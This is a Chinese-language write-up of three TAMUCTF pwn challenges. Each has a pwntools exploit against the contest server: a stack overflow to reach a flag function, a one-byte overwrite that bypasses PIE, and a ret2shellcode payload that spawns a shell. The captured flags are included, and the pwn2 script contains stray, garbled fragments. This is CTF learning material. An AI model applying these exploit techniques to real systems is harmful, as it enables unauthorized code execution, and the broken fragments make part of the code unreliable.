文章 - TAMUCTF-部分pwn解析

TAMUCTF-部分pwn解析

和队里师傅做了这个比赛的题目难度有些梯度，但是后面两个题难度实在大了，水平太低不会了，前面的题还是比较简单有一定的借鉴意义，记录一下大佬勿喷。

pwn1

第一题比较简单大概看一下。

main

从栈分布和main函数来看就是一个栈溢出加上覆盖指针然后成功运行print_flag函数就可以拿到flag了。

exp

p = remote("nc pwn.tamuctf.com",4321)
#p = process('./pwn1.dms')
context.log_level = 'debug'
pa_0 = "Sir Lancelot of Camelot"
pa_1 = "To seek the Holy Grail."
pa_2 = "a"*0x2b +p32(0xDEA110C8)

p.recvuntil("What... is your name?\n")
p.sendline(pa_0)
p.recvuntil("What... is your quest?\n")
p.sendline(pa_1)

p.recvuntil("What... is my secret?\n")
p.sendline(pa_2)

p.interactive()
#gigem{34sy_CC428ECD75A0D392}

pwn2

这个题目考查的是pie的绕过，用的方法是低位覆盖

保护

main

逻辑比较简单就不多说了

select_function

主要是进行一个运行函数的筛选，其中的one和two我就不进行截图查看了就是一个puts函数没有什么特别的，这里我想的是利用strncpy的一个一个字节的溢出来造成最后程序的转跳，因为one的函数前面3个字节和后门函数是一样的，这里具体可以看栈分布，就不截图出来的。

exp

p = process('pwn2.dms')
&& cat flag.txt
#gigem{5y573m_0v3rfl0w}
'''
'''
p = remote("nc pwn.tamuctf.com",4322)
#p = process("pwn2.dms")
context.log_level = 'debug'
#6D8
pay ="a"*(0x1e)+"\xd8"
#gdb.attach(p)
p.recvuntil("Which function would you like to call?")
p.sendline(pay)

p.interactive()
#gigem{4ll_17_74k35_15_0n3}

pwn3

一个ret2sc的题，具体难度就是在调试的时候可能会有各种各样的问题

保护

这个地方没有开始nx，所以想到可以去执行ret2sc

main

程序的开始就给了我们我们输入的stack地址，我们的stack地址加上填充的长度然后输入我们的shellcode，接着返回地址覆盖成我们已经布置好栈的位置这样就可以getshell拿到flag了。

exp

#p = process("./pwn3.dms")
context(arch = 'i386', os = 'linux')
p = remote("pwn.tamuctf.com",4323)

context.log_level = 'debug'
#gdb.attach(p)
p.recvuntil("Take this, you might need it on your journey ")
ret = int(p.recv()[:10],16)
print ret
p.sendline("a"*(0x12a+4)+p32(ret+0x12a+0x8)+asm(shellcraft.sh()))

p.interactive()
#gigem{r3m073_fl46_3x3cu710n}